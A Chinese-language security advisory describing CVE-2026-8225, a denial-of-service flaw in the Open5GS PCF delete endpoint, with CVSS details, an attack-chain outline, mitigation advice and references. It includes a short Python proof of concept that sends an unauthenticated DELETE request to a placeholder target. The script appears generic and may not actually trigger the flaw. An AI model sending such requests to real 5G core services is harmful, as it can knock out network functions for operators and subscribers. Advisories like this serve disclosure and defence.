CVE-2026-8225 Open5GS 拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8225

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及之前版本存在安全漏洞。该漏洞源于src/pcf/sm-sm.c文件中pcf_npcf_smpolicycontrol_handle_delete函数的delete Endpoint组件处理逻辑存在缺陷。未经身份认证的远程攻击者可利用此漏洞，通过精心构造的数据包发起攻击，导致目标系统拒绝服务。目前漏洞利用代码已公开，且厂商尚未对此做出响应。

技术细节

该漏洞位于Open5GS的PCF（策略控制功能）模块中。具体受影响的文件是src/pcf/sm-sm.c，问题出在pcf_npcf_smpolicycontrol_handle_delete函数对delete Endpoint的处理上。由于对特定输入数据的验证不足或处理逻辑错误，当攻击者向该接口发送恶意请求时，可能导致程序异常崩溃或资源耗尽。CVSS向量显示攻击复杂度低，无需权限且无需用户交互，攻击者可从网络远程发起攻击。漏洞影响可用性（A:L），但未影响机密性和完整性。由于利用代码已公开，风险进一步增加。

攻击链分析

STEP 1

侦察

攻击者扫描互联网或内网，寻找暴露在公网的Open5GS服务，特别是PCF接口。

STEP 2

武器化

攻击者准备特制的HTTP DELETE请求包，针对src/pcf/sm-sm.c中的delete Endpoint逻辑缺陷。

STEP 3

交付

攻击者通过网络向目标Open5GS服务的PCF组件发送恶意DELETE请求，无需认证。

STEP 4

利用

目标系统处理该请求时，触发pcf_npcf_smpolicycontrol_handle_delete函数中的逻辑缺陷。

STEP 5

影响

导致Open5GS进程崩溃或资源耗尽，造成5G核心网功能瘫痪，实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target Open5GS PCF Endpoint URL
# Replace with actual target address
target_url = "http://<target-ip>:80/npcf/smpolicycontrol/v1/sm-policies/<policy_id>"

# Headers mimicking a legitimate 5G Core request
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Open5GS-Tester"
}

try:
    # Sending a DELETE request to trigger the vulnerable function
    # pcf_npcf_smpolicycontrol_handle_delete
    response = requests.delete(target_url, headers=headers, timeout=5)
    
    if response.status_code == 500 or response.status_code == 404:
        print("[+] Potential vulnerability triggered, service returned error code.")
    else:
        print(f"[-] Request returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Service appears to be down (DoS condition): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

建议管理员暂时限制对PCF组件的公网访问，仅允许可信IP连接。在厂商发布补丁前，可通过部署WAF或防火墙规则过滤针对delete Endpoint的异常请求。同时应密切监控Open5GS服务日志，一旦发现崩溃迹象及时重启服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8225
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8225
3 Details https://www.cvedetails.com/cve/CVE-2026-8225/
4 VulDB https://vuldb.com/cve/CVE-2026-8225
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4440
7 Link https://vuldb.com/submit/808444
8 Link https://vuldb.com/vuln/362442
9 Link https://vuldb.com/vuln/362442/cti